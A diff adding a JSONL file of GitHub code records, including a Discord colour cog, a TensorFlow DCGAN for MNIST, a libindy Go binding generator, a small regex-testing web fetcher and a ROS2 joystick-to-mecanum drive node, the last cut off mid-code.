diff --git "a/2430.jsonl" "b/2430.jsonl" new file mode 100644--- /dev/null +++ "b/2430.jsonl" @@ -0,0 +1,355 @@ +{"seq_id":"2947718617","text":"import random\nfrom colour import Color as col\n\nfrom .customconverters import BetterMemberConverter\nfrom redbot.core import checks, commands\nfrom redbot.core.commands import Context\n\nclass VidemColor(commands.Cog):\n\tdef __init__(self, bot):\n\t\tself.color_cog = color_cog = bot.get_cog('Color')\n\n\t\tif not color_cog:\n\t\t\traise Exception('Could not load the color cog')\n\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='randomcolor')\n\tasync def randomcolor(self, ctx: Context):\n\t\t\"\"\"Gets a random color\"\"\"\n\t\tc = col(rgb=(random.randint(0, 255) / 255, random.randint(0, 255) / 255, random.randint(0, 255) / 255))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='mycolor')\n\tasync def mycolor(self, ctx: Context):\n\t\t\"\"\"Gets the display color of the invoker\"\"\"\n\t\tc = col(rgb=tuple(v / 255 for v in ctx.author.color.to_rgb()))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\t\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='membercolor')\n\tasync def membercolor(self, ctx: Context, member: BetterMemberConverter):\n\t\t\"\"\"Gets the display color of the invoker\"\"\"\n\t\tc = col(rgb=tuple(v / 255 for v in member.color.to_rgb()))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\t","repo_name":"therealvidem/Cogs","sub_path":"videmcolor/videmcolor.py","file_name":"videmcolor.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3199825416","text":"from discriminator_generator import discriminator, decoder\n\nimport math\nimport numpy as np \nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib import losses\nfrom tensorflow.contrib.framework import arg_scope\nimport tensorflow as tf \nfrom scipy.misc import imsave\nimport sys\nimport os\n\ndef concat_elu(inputs):\n\treturn tf.nn.elu(tf.concat([-inputs, inputs],3))\n\nclass GAN():\n\tdef __init__(self, hidden_size, batch_size, learning_rate):\n\t\tself.batch_size = batch_size\n\t\tself.hidden_size = hidden_size\n\n\t\tself.input_tensor = tf.placeholder(tf.float32, [None,28*28])\n\n\t\twith arg_scope([layers.conv2d, layers.conv2d_transpose],\n\t\t\t\t\t\tactivation_fn = concat_elu,\n\t\t\t\t\t\tnormalizer_fn = layers.batch_norm,\n\t\t\t\t\t\tnormalizer_params={'scale':True}):\n\t\t\twith tf.variable_scope(\"model\"):\n\t\t\t\tD1 = discriminator(self.input_tensor)\n\t\t\t\tD_params_num = len(tf.trainable_variables())\n\t\t\t\tG = decoder(tf.random_normal([batch_size, hidden_size]))\n\t\t\t\tself.sampled_tensor = G\n\t\t\twith tf.variable_scope('model', reuse=True):\n\t\t\t\tD2 = discriminator(G)\n\n\t\t\tself.D_loss = self.__get_discriminator_loss(D1,D2)\n\t\t\tself.G_loss = self.__get_generator_loss(D2)\n\t\t\tparams = tf.trainable_variables()\n\t\t\tD_params = params[:D_params_num]\n\t\t\tG_params = params[D_params_num:]\n\n\t\t\tglobal_step = tf.contrib.framework.get_or_create_global_step()\n\n\n\n\t\t\tself.train_discriminator = layers.optimize_loss(\n\t\t\t\tself.D_loss, global_step, learning_rate/10., 'Adam', variables=D_params, update_ops=[])\n\t\t\tself.train_generator = 
layers.optimize_loss(\n\t\t\t\tself.G_loss, global_step, learning_rate, 'Adam', variables=G_params, update_ops=[])\n\n\n\t\t\tself.saver = tf.train.Saver()\n\t\t\tself.sess = tf.Session()\n\t\t\tself.sess.run(tf.global_variables_initializer())\n\n\tdef __get_discriminator_loss(self, D1, D2):\n\n\t\t# return losses.sigmoid_cross_entropy(D1, tf.ones(tf.shape(D1))) + \\\n\t\t# \t\t\t\t\tlosses.sigmoid_cross_entropy(D2, tf.zeros(tf.shape(D2)))\n\t\td_loss_real = tf.nn.sigmoid_cross_entropy_with_logits(logits = D1, labels = tf.ones(tf.shape(D1)))\n\t\td_loss_fake = tf.nn.sigmoid_cross_entropy_with_logits(logits = D2, labels = tf.zeros(tf.shape(D2)))\n\t\treturn tf.reduce_mean(d_loss_fake+d_loss_real)\n\n\tdef __get_generator_loss(self, D2):\n\t\t# return losses.sigmoid_cross_entropy(D2, tf.ones(tf.shape(D2)))\n\t\treturn tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D2, labels=tf.ones(tf.shape(D2))))\n\n\tdef update_params(self, inputs):\n\t\t# d_loss_value = self.sess.run(self.train_discriminator, {self.input_tensor: inputs})\n\n\t\t# g_loss_value = self.sess.run(self.train_generator)\n\n\t\t# return g_loss_value\n\n\t\t_,d_loss_value = self.sess.run([self.train_discriminator, self.D_loss], {\n\t\t\tself.input_tensor:inputs})\n\t\t_,g_loss_value = self.sess.run([self.train_generator, self.G_loss])\n\t\t_,g_loss_value = self.sess.run([self.train_generator, self.G_loss])\n\t\treturn g_loss_value, d_loss_value\n\n\tdef train(self, config):\n\t\tself.data_X = self.load_mnist()\n\n\t\tself.load(config.checkpoint_dir)\n\n\t\tfor ep in range(config.epoch):\n\t\t\ttotal_batch = len(self.data_X)//self.batch_size\n\t\t\ttrain_loss = 0.0\n\t\t\tfor b in range(total_batch):\n\t\t\t\tinput_x = self.data_X[b*self.batch_size: (b+1)*self.batch_size]\n\t\t\t\t# g_loss = self.update_params(input_x)\n\t\t\t\t# train_loss += g_loss\n\t\t\t\t# g_loss = train_loss/(b*self.batch_size)\n\t\t\t\t# sys.stdout.write(\"\\r {}/{} epoch {}/{} batch, g_loss:{:04f}\"\n\t\t\t\t# \t.format(ep,config.epoch, b, total_batch, g_loss))\n\t\t\t\tg_loss,d_loss = self.update_params(input_x)\n\t\t\t\tsys.stdout.write(\"\\r {}/{} epoch {}/{} batch, g_loss:{:.4f}, d_loss:{:.4f}\".format(ep,config.epoch, b, total_batch, g_loss, d_loss))\n\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t\tif(ep*total_batch+b)%100==0:\n\t\t\t\t\tsamples = self.sess.run(self.sampled_tensor)\n\t\t\t\t\t# print(sampled_images.shape,\"\\n\")\n\t\t\t\t\tsamples = np.reshape(samples,[samples.shape[0],28,28,1])\n\n\t\t\t\t\tself.save_image(samples,'./{}/train_{}_{}.png'.format(config.sample_dir, ep, b))\n\t\t\t\t\tglobal_step = tf.contrib.framework.get_or_create_global_step()\n\t\t\t\t\tself.save(config.checkpoint_dir, global_step)\n\n\n\n\n\n\tdef load_mnist(self):\n\t\tf = np.load('../mnist.npz')\n\t\tx_train,y_train,x_test,y_test = f['x_train'],f['y_train'],f['x_test'],f['y_test']\n\n\t\tX = np.concatenate((x_train, x_test),axis=0)\n\t\tX = np.reshape(X,[X.shape[0],-1])\n\t\treturn X/255.\n\n\tdef save_image(self, images, path):\n\t\t# img_height, img_width, channel = images.shape[1:]\n\t\t# print (images.shape)\n\t\tmanifold_h = int(np.ceil(np.sqrt(images.shape[0])))\n\t\tmanifold_w = int(np.floor(np.sqrt(images.shape[0])))\n\t\tshape = [manifold_h, manifold_w]\n\n\t\timages = np.squeeze(images)\n\t\theight,width = images.shape[1:]\n\n\t\tret = np.zeros((shape[0]*height, shape[1]*width))\n\n\t\tfor i,img in enumerate(images):\n\t\t\th_idx = int(i/shape[0])\n\t\t\tw_idx = int(i%shape[1])\n\t\t\t# print (h_idx*height, 
w_idx*width)\n\t\t\tret[h_idx*height:(h_idx+1)*height, w_idx*width:(w_idx+1)*width] = img\n\n\t\timsave(path, ret)\n\n\tdef save(self, checkpoint_dir, step):\n\t\tmodel_name = \"DCGAN.model\"\n\t\t# checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)\n\n\n\t\tself.saver.save(self.sess,\n\t\t\t\t\t\tos.path.join(checkpoint_dir, model_name),\n\t\t\t\t\t\tglobal_step=step)\n\n\tdef load(self, checkpoint_dir):\n\t\timport re\n\t\tprint(\" [*] Reading checkpoints...\")\n\t\t# checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)\n\n\t\tckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n\t\tif ckpt and ckpt.model_checkpoint_path:\n\t\t\tckpt_name = os.path.basename(ckpt.model_checkpoint_path)\n\t\t\tself.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))\n\t\t\tcounter = int(next(re.finditer(\"(\\d+)(?!.*\\d)\",ckpt_name)).group(0))\n\t\t\tprint(\" [*] Success to read {}\".format(ckpt_name))\n\t\t\treturn True, counter\n\t\telse:\n\t\t\tprint(\" [*] Failed to find a checkpoint\")\n\t\t\treturn False, 0\n","repo_name":"uqjwen/dcgan-tensorflow-mnist-easy","sub_path":"dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":5679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"44942459932","text":"import os\n\nfrom indy_gen.function import FunctionParameter, IndyFunction\n\nfrom .utils import to_camel_case, go_param_string, types_string, c_param_string, names_string\n\n\n_REGISTER_CALL = '''\n\tpointer, commandHandle, resCh, err := resolver.RegisterCall(\"{function_name}\")\n\tif err != nil {{\n\t res_err = fmt.Errorf(\"Failed to register call for {function_name}. Error: %s\", err)\n\t return {result_var_names}\n\t}}\n'''\n_CALLBACK_ERRCHECK = '''\n if deregisterErr != nil {\n panic(\"Invalid handle in callback!\")\n }\n'''\n_C_CALL_CHECK = '''\n if code != 0 {{\n res_err = fmt.Errorf(\"Libindy returned code: %d\", code)\n return {result_var_names}\n }}\n'''\n_RESULT_RETRIEVING = '''\n _res := <- resCh\n res := _res.({expected_type})\n'''\n_RESULT_RETRIEVING_CHECK_SINGLE = '''\n if res != 0 {\n res_err = fmt.Errorf(\"Libindy returned code: %d\", res)\n'''\n_RESULT_RETRIEVING_CHECK_MULTIPLE = '''\n if res.{code_field_name} != 0 {{\n res_err = fmt.Errorf(\"Libindy returned code: %d\", res.{code_field_name})\n'''\n\nclass GoTranslator:\n GO_TO_CGO_TYPES = {\n 'string': '*C.char',\n 'int32': 'C.int32_t',\n 'uint32': 'C.uint32_t',\n 'int': 'C.int64_t',\n 'uint64': 'C.uint64_t',\n '*uint8': '*C.char',\n 'bool': 'C.bool',\n }\n\n C_TO_CGO_TYPES = {\n 'unsigned long long': 'C.ulonglong',\n 'int32_t': 'C.int32_t',\n 'uint32_t': 'C.uint32_t',\n 'unsigned int': 'C.uint',\n 'long': 'C.long',\n 'uint8_t*': 'C.uint8_t',\n 'bool': 'C.bool',\n }\n\n CGO_TO_GO_TYPES = {\n '*C.char': 'string',\n 'C.int32_t': 'int32',\n 'C.uint32_t': 'uint32',\n 'C.int64_t': 'int64',\n 'C.uint64_t': 'uint64',\n '*C.uint8_t': 'string',\n 'C.bool': 'bool',\n }\n\n\n def __init__(self, output_path):\n self._output_path = output_path\n\n def translate_single(self, name, c_func):\n go_function = GoFunction.from_indy_function(c_func)\n result_strings = self._generate_result_strings(go_function)\n callback_name, callback_code = self._generate_callback(go_function, result_strings[1], result_strings[2])\n c_proxy_name, c_proxy_declaration, c_proxy_extern, c_proxy_code = self._generate_c_proxy(c_func, callback_name)\n core_code = self._generate_core(go_function, c_func.name, c_proxy_name, result_strings[3])\n print(core_code)\n\n def 
translate(self, name, functions):\n callbacks = []\n c_proxy_declarations = []\n c_proxy_extern_declarations = []\n c_proxies = []\n result_struct_definitions = []\n cores = []\n\n for func_name, c_func in functions.items():\n go_function = GoFunction.from_indy_function(c_func)\n result_strings = self._generate_result_strings(go_function)\n callback_name, callback_code = self._generate_callback(go_function, result_strings[1], result_strings[2])\n c_proxy_name, c_proxy_declaration, c_proxy_extern, c_proxy_code = self._generate_c_proxy(c_func, callback_name)\n core_code = self._generate_core(go_function, c_func.name, c_proxy_name, result_strings[3])\n\n callbacks.append(callback_code)\n c_proxy_declarations.append(c_proxy_declaration)\n c_proxy_extern_declarations.append(c_proxy_extern)\n c_proxies.append(c_proxy_code)\n cores.append(core_code)\n result_struct_definitions.append(result_strings[0])\n\n if cores:\n self._populate_c_file(name, c_proxy_extern_declarations, c_proxies)\n self._populate_go_file(name, c_proxy_declarations, callbacks, result_struct_definitions, cores)\n\n def _populate_c_file(self, domain, extern_declarations, proxies):\n full_path = os.path.join(self._output_path, domain + '.c')\n\n with open(full_path, 'w') as f:\n f.write('#include \\n')\n f.write('#include \\n\\n')\n f.write('\\n'.join(extern_declarations))\n f.write('\\n\\n\\n')\n f.write('\\n\\n\\n'.join(proxies))\n f.write('\\n')\n\n def _populate_go_file(self, domain, c_proxy_declarations, callbacks, result_struct_defintions, core_functions):\n full_path = os.path.join(self._output_path, domain + '.go')\n\n with open(full_path, 'w') as f:\n f.write('package indy\\n\\n')\n f.write('/*\\n')\n f.write('#include \\n')\n f.write('#include \\n')\n f.write('#include \\n')\n f.write('\\n'.join(c_proxy_declarations))\n f.write('\\n')\n f.write('*/\\n')\n f.write('import \"C\"\\n\\n')\n f.write('import (\\n\\t\"fmt\"\\n\\t\"unsafe\"\\n)\\n\\n')\n f.write('\\n\\n'.join(core_functions))\n f.write('\\n\\n')\n f.write('\\n\\n'.join(result_struct_defintions))\n f.write('\\n\\n')\n f.write('\\n\\n'.join(callbacks))\n f.write('\\n\\n')\n\n def _generate_callback(self, go_function, result_initialisation, result_sending):\n callback_name = go_function.name[0].lower() + go_function.name[1:] + 'Callback'\n callback_export = '//export ' + callback_name\n callback_param_strings= []\n callback_param_types = []\n callback_param_names = []\n for param in go_function.callback.parameters:\n param_type_cgo = self.GO_TO_CGO_TYPES[param.type]\n callback_param_strings.append(f'{param.name} {param_type_cgo}')\n callback_param_names.append(param.name)\n callback_param_types.append(param_type_cgo)\n callback_params = ', '.join(callback_param_strings)\n go_var_names, go_var_declarations, go_var_setups = self._setup_go_variables(callback_param_names[1:], callback_param_types[1:])\n var_declaration_code = '\\n\\t'.join(go_var_declarations)\n err_setup_code = go_var_setups[0]\n setup_code = '\\n\\n\\t'.join(go_var_setups[1:])\n signature = f'func {callback_name}({callback_params})'\n first_param_name = go_function.callback.parameters[0].name\n result_initialisation_lines = result_initialisation.split('\\n')\n result_initialisation_error = '\\n\\t'.join(result_initialisation_lines)\n error_check = f'if go_err != 0 {{\\n\\t\\t{result_initialisation_error}\\n\\t{result_sending}\\n\\t\\treturn\\n\\t}}'\n deregister = f'resCh, deregisterErr := resolver.DeregisterCall(int32({first_param_name}))'\n callback_code = 
(f'{callback_export}\\n{signature}{{\\n\\t{var_declaration_code}\\n\\n\\t{deregister}{_CALLBACK_ERRCHECK}\\n'\n f'\\t{err_setup_code}\\n\\t{error_check}\\n\\n\\t{setup_code}\\n\\t{result_initialisation}{result_sending}\\n}}')\n return callback_name, callback_code\n\n def _generate_result_strings(self, go_function):\n if len(go_function.callback.parameters) > 2:\n return self._generate_result_strings_for_complex_result(go_function)\n else:\n callback_res_name = go_function.callback.parameters[1].name\n callback_res_type = go_function.callback.parameters[1].type\n sending = f'resCh <- go_{callback_res_name}'\n receiving = _RESULT_RETRIEVING.format(expected_type=callback_res_type)\n receiving = f'{receiving}\\t{_RESULT_RETRIEVING_CHECK_SINGLE}'\n return '', '', sending, receiving\n\n def _generate_result_strings_for_complex_result(self, go_function):\n function_name_lower = go_function.name[0].lower() + go_function.name[1:]\n result_struct_name = f'{function_name_lower}Result'\n result_fields = go_function.callback.parameters[1:]\n struct_field_declarations = []\n for field in result_fields:\n if field.type == '*uint8':\n field_type = 'string'\n else:\n field_type = field.type\n struct_field_declarations.append(f'{field.name} {field_type}')\n field_declaration_string = '\\n\\t'.join(struct_field_declarations)\n struct_declaration = f'type {result_struct_name} struct {{\\n\\t{field_declaration_string}\\n}}'\n\n struct_field_initialisations = []\n for field in result_fields:\n struct_field_initialisations.append(f'{field.name}: go_{field.name}')\n field_initialisation_string = ',\\n\\t\\t'.join(struct_field_initialisations)\n struct_initialisation = f'res := &{result_struct_name} {{\\n\\t\\t{field_initialisation_string},\\n\\t}}\\n'\n receiving = _RESULT_RETRIEVING.format(expected_type='*' + result_struct_name)\n struct_err_field_name = go_function.callback.parameters[1].name\n receiving += f'\\t{_RESULT_RETRIEVING_CHECK_MULTIPLE}'.format(code_field_name=struct_err_field_name)\n\n return struct_declaration, struct_initialisation, '\\tresCh <- res', receiving\n\n def _generate_c_proxy(self, indy_function, go_callback_name):\n extern_declaration_types = types_string(indy_function.callback.parameters)\n extern_declaration = f'extern void {go_callback_name}({extern_declaration_types});'\n c_proxy_name = indy_function.name + '_proxy'\n fp_param = FunctionParameter('fp', 'void *')\n all_params = [fp_param] + indy_function.parameters\n c_proxy_declaration = f'{indy_function.return_type} {c_proxy_name}({types_string(all_params)});'\n c_proxy_types_declaration = c_param_string(all_params)\n c_proxy_signature = f'{indy_function.return_type} {c_proxy_name}({c_proxy_types_declaration})'\n indy_function_types = types_string(all_params[1:])\n function_cast = f'{indy_function.return_type} (*func)({indy_function_types}, void *) = fp;'\n function_arguments = names_string(all_params[1:])\n function_invocation = f'return func({function_arguments}, &{go_callback_name});'\n c_proxy_code = f'{c_proxy_signature} {{\\n\\t{function_cast}\\n\\t{function_invocation}\\n}}'\n return c_proxy_name, c_proxy_declaration, extern_declaration, c_proxy_code\n\n def _generate_core(self, go_indy_function, indy_function_name, c_proxy_name, result_retrieval):\n return_parameters = go_indy_function.callback.parameters[1:]\n first_return_param = return_parameters[0]\n return_parameters.pop(0)\n return_parameters.append(first_return_param)\n\n return_types = [param.type for param in return_parameters]\n return_types[-1] = 'error'\n 
return_var_names = ['res_' + param.name for param in return_parameters]\n return_var_names_string = ', '.join(return_var_names)\n return_vars_init = []\n for name, type in zip(return_var_names, return_types):\n return_vars_init.append(f'var {name} {type}')\n return_vars_init_string = '\\n\\t'.join(return_vars_init)\n\n return_types_string = ', '.join(return_types)\n\n params = go_param_string(go_indy_function.parameters[1:])\n\n signature = f'func {go_indy_function.name}({params}) ({return_types_string})'\n\n register_call = _REGISTER_CALL.format(function_name=indy_function_name,\n result_var_names=return_var_names_string)\n # handle = FunctionParameter('commandHandle', 'int32')\n # variables = [handle] + go_indy_function.parameters\n variables = go_indy_function.parameters\n\n variable_names, variable_passing, variable_setups = self._setup_variables(variables)\n variable_setup_string = '\\n\\n\\t'.join(variable_setups)\n variable_names.insert(0, 'pointer')\n variable_passing.insert(0, 'pointer')\n variable_names = ', '.join(variable_passing)\n\n c_call = f'code := C.{c_proxy_name}({variable_names})'\n c_call_check = _C_CALL_CHECK.format(result_var_names=return_var_names_string)\n\n result_var_assignments = [f'{var_name} = res.{var_name.replace(\"res_\", \"\")}' for var_name in return_var_names\n if var_name != 'res_err']\n result_var_assignment_string = '\\n\\t' + '\\n\\t'.join(result_var_assignments)\n retrieval_and_check = result_retrieval + f'\\t\\treturn {return_var_names_string}\\n\\t}}\\n'\n\n return (f'{signature} {{\\n\\t{return_vars_init_string}\\n\\t{register_call}'\n f'\\n\\n\\t{variable_setup_string}\\n\\n\\t{c_call}\\t{c_call_check}'\n f'\\t{retrieval_and_check}'\n f'\\t{result_var_assignment_string}\\n\\n\\treturn {return_var_names_string}\\n}}')\n\n def _setup_variables(self, variables):\n variable_names = []\n variable_passings = []\n variable_setups = []\n\n for var in variables:\n if isinstance(var, GoFunction):\n name, passing, setup = self._setup_func_var(var)\n else:\n name, passing, setup = self._setup_var(var)\n variable_names.append(name)\n variable_passings.append(passing)\n variable_setups.append(setup)\n\n return variable_names, variable_passings, variable_setups\n\n def _setup_go_variables(self, names, types):\n go_variable_names = []\n go_variable_declarations = []\n go_variable_setups = []\n\n for callback_param_name, callback_param_type in zip(names, types):\n name, declaration, setup = self._setup_go_var(callback_param_name, callback_param_type)\n go_variable_names.append(name)\n go_variable_declarations.append(declaration)\n go_variable_setups.append(setup)\n\n return go_variable_names, go_variable_declarations, go_variable_setups\n\n def _setup_go_var(self, var_name, var_type):\n go_var_name = 'go_' + var_name\n go_var_type = self.CGO_TO_GO_TYPES[var_type]\n go_var_declaration = f'var {go_var_name} {go_var_type}'\n if var_type == '*C.char':\n setup = f'if {var_name} != nil {{\\n\\t\\t{go_var_name} = C.GoString({var_name})\\n\\t}}\\t\\t'\n # f'defer C.free(unsafe.Pointer({var_name}))\\n\\t}}')\n elif var_type == 'C.int32_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == '*C.uint8_t':\n setup = f'if {var_name} != nil {{\\n\\t\\t{go_var_name} = C.GoString({var_name})\\n\\t}}\\t\\t'\n # f'defer C.free(unsafe.Pointer({var_name}))\\n\\t}}'\n elif var_type == 'C.uint32_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 'C.int64_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 
'C.uint64_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 'C.bool':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n else:\n raise Exception(f'Unsupported var_type: {var_type}')\n return go_var_name, go_var_declaration, setup\n\n def _setup_func_var(self, var):\n c_var_name = 'c_' + var.name\n var_declaration = f'var {c_var_name} unsafe.Pointer'\n setup = f'{var_declaration}\\n\\t{c_var_name} = unsafe.Pointer(&{var.name})'\n return c_var_name, c_var_name, setup\n\n def _setup_var(self, var):\n c_var_name = 'c_' + var.name\n passing = c_var_name\n c_var_type = self.GO_TO_CGO_TYPES[var.type]\n if var.type == 'string':\n var_declaration = f'var {c_var_name} {c_var_type}'\n setup = (f'if {var.name} != \"\" {{\\n\\t\\t{c_var_name} = C.CString({var.name})\\n\\t\\t'\n f'defer C.free(unsafe.Pointer({c_var_name}))\\n\\t}}')\n setup = f'{var_declaration}\\n\\t{setup}'\n elif var.type == 'int32':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'uint32':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'int':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'uint64':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == '*uint8':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}(*{var.name})'\n passing = '&' + passing\n elif var.type == 'bool':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n else:\n raise Exception(f'No setup for var type: {var.type}')\n\n return c_var_name, passing, setup\n\n\n\nclass GoFunction:\n TYPE_MAP = {\n 'int32_t': 'int32',\n 'const char*': 'string',\n 'const char *': 'string',\n 'const char * const': 'string',\n 'const char *const': 'string',\n 'char*': 'string',\n 'void': '',\n 'uint8_t*': 'string',\n 'uint32_t': 'uint32',\n 'unsigned int': 'uint32',\n 'int32_t*': '*int32',\n 'char**': '*string',\n 'long': 'int',\n 'unsigned long long': 'uint64',\n 'bool': 'bool',\n }\n\n API_TYPE_MAP = {\n '*C.char': 'string',\n }\n\n\n @classmethod\n def from_indy_function(cls, indy_function):\n try:\n camel_case_name = to_camel_case(indy_function.name.replace('indy_', ''))\n go_func_name = camel_case_name[0].title() + camel_case_name[1:]\n\n go_func_params = []\n for param in indy_function.parameters:\n if isinstance(param, IndyFunction):\n go_func_params.append(cls.from_indy_function(param))\n else:\n qualified_type = param.qualified_type()\n go_param_type = cls.TYPE_MAP.get(qualified_type, cls.TYPE_MAP[param.type])\n go_param_name = to_camel_case(param.name)\n go_param = FunctionParameter(go_param_name, go_param_type, original_type=param.type)\n go_func_params.append(go_param)\n\n go_return_type = cls.TYPE_MAP[indy_function.return_type]\n\n if indy_function.callback:\n go_func_callback = cls.from_indy_function(indy_function.callback)\n else:\n go_func_callback = None\n\n return cls(go_func_name, go_return_type, go_func_params, go_func_callback)\n except Exception as e:\n raise Exception(f'Failed to create go function {indy_function.name}. 
Exception {e}') from e\n\n def __init__(self, name, return_type, parameters, callback):\n name = name.replace('*', '')\n if name == 'type':\n name = 'type_'\n self.name = name\n self.return_type = return_type\n self.parameters = parameters\n self.callback = callback\n\n def __str__(self):\n param_string = '\\n\\t'.join(str(param) for param in self.parameters)\n return (f'[GoFunction]\\nName: {self.name}\\nReturn type: {self.return_type}\\n' +\n f'Parameters:\\n\\t{param_string}\\n' +\n f'Callback: {str(self.callback)}\\n')\n\n def __repr__(self):\n return str(self)\n\n @property\n def type(self):\n return f'func({types_string(self.parameters)})({self.return_type})'","repo_name":"keichiri/indy-gen","sub_path":"indy_gen/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23109989359","text":"import urllib.request\nimport re\nfrom selenium import webdriver\n\ndef do_static_web(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\"}\n req = urllib.request.Request(url, headers=headers)\n resp = urllib.request.urlopen(req)\n return resp.read().decode(\"utf-8\")\n\n\ndef do_real_browser(browser, url):\n #browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\")\n browser.get(url)\n return browser.page_source\n\n\ndef test(html, your_regex):\n #print(html)\n pattern = re.compile(your_regex, re.S)\n content_list = pattern.findall(html)\n print(content_list)\n\nif __name__ == \"__main__\":\n #your_regex = input(\"输入要测试的正则:\")\n #url = input(\"输入要测试的url:\")\n your_regex = '()'\n url = \"https://tieba.baidu.com/p/5629389674\"\n command = input(\"直接打开输入1,浏览器打开输入2:\")\n if command == \"1\":\n test(do_static_web(url), your_regex)\n elif command == \"2\":\n browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\")\n test(do_real_browser(browser,url), your_regex)\n browser.close()\n else:\n print(\"fuck off!\")\n","repo_name":"HHIngo/BrowserSpider","sub_path":"spider/checkRegex.py","file_name":"checkRegex.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"17738976826","text":"import rclpy\n\nfrom rclpy.node import Node\n\nfrom sensor_msgs.msg import Joy\n\nfrom std_msgs.msg import String\n\nfrom geometry_msgs.msg import Twist\n\nfrom rclpy import qos\n\nimport math\n\nclass Ps4(Node):\n\tdef __init__(self):\n\t\tsuper().__init__(\"xbox_control_node\")\n\t\tself.dat = self.create_subscription(Joy, \"joy\", self.sub_callback, qos_profile=qos.qos_profile_sensor_data)\n\t\tself.dat\n\n\t\tself.sent_drive = self.create_publisher(Twist, \"control_drive_topic\", qos_profile=qos.qos_profile_system_default)\n\t\tself.sent_drive_timer = self.create_timer(0.05, self.sent_drive_callback)\n\n\t\tself.button = {}\n\t\tself.all = [\"S\",\"X\",\"O\",\"T\",\"L1\",\"R1\",\"L2\",\"R2\",\"Share\",\"Option\",\"AL\",\"AR\",\"PS\",\"Home\"]\n\t\tfor index, element in enumerate(self.all):\n\t\t\tself.button[element] = 0\n\n\t\tself.axes = {}\n\t\tself.all2 = [\"LX\", \"LY\", \"RX\", \"LT\", \"RT\", \"RY\"]\n\t\tfor index, element in enumerate(self.all2):\n\t\t\tself.axes[element] = 0\n\n\n\tdef sub_callback(self, msg_in):\t#subscription topic\n\t\tfor index, element in 
enumerate(self.all):\n\t\t\tself.button[element] = msg_in.buttons[index]\n#\t\t\tprint(f\"{self.all[index]} : {self.button[element]}\")\n\n\t\tfor index, element in enumerate(self.all2):\n\t\t\tif msg_in.axes[index] <= 0.2 and msg_in.axes[index] >= -0.2:\n\t\t\t\tself.axes[element] = 0\n\t\t\telse:\n\t\t\t\tself.axes[element] = msg_in.axes[index]\n#\t\t\tprint(f\"{self.all2[index]} : {self.axes[element]}\")\n\n\tdef sent_drive_callback(self): #publisher drive topic\n\t\tlimit = 0.1\n\n\t\tmsg = Twist()\n\n\t\tx = -1*self.axes[\"LX\"]\n\t\ty = self.axes[\"LY\"]\n\n\t\tif (int(self.button[\"L1\"]) == 0):\n\t\t\tif x < limit and x > -1*limit and y < limit and y >-1*limit:\n\t\t\t\tx = 0\n\t\t\t\ty = 0\n\t\t\telif x < limit and x > -1*limit:\n\t\t\t\tx = 0\n\t\t\telif y < limit and y > -1*limit:\n\t\t\t\ty = 0\n\t\t\telif x >= 0 and y >= 0:\n\t\t\t\tx = 0.707\n\t\t\t\ty = 0.707\n\t\t\telif x <= 0 and y >= 0:\n\t\t\t\tx = -0.707\n\t\t\t\ty = 0.707\n\t\t\telif x <= 0 and y <= 0:\n\t\t\t\tx = -0.707\n\t\t\t\ty = -0.707\n\t\t\telif x >= 0 and y <= 0:\n\t\t\t\tx = 0.707\n\t\t\t\ty = -0.707\n\t\t\t\t\n\n\t\tturn = -1*self.axes[\"RX\"]\n\t\ttheta = math.atan2(y, x)\n\t\tpower = math.hypot(x, y)\n\t\tsin = math.sin(theta - math.pi/4)\n\t\tcos = math.cos(theta - math.pi/4)\n\t\tMax = max(abs(sin), abs(cos))\n\t\tleftFront = power * cos/Max + turn\n\t\trightFront = power * sin/Max - turn\n\t\tleftBack = power * sin/Max + turn\n\t\trightBack = power * cos/Max - turn\n\n\t\tif ((power + abs(turn)) > 1):\n\t\t\tleftFront /= (power + abs(turn))\n\t\t\trightFront /= (power + abs(turn))\n\t\t\tleftBack /= (power + abs(turn))\n\t\t\trightBack /= (power + 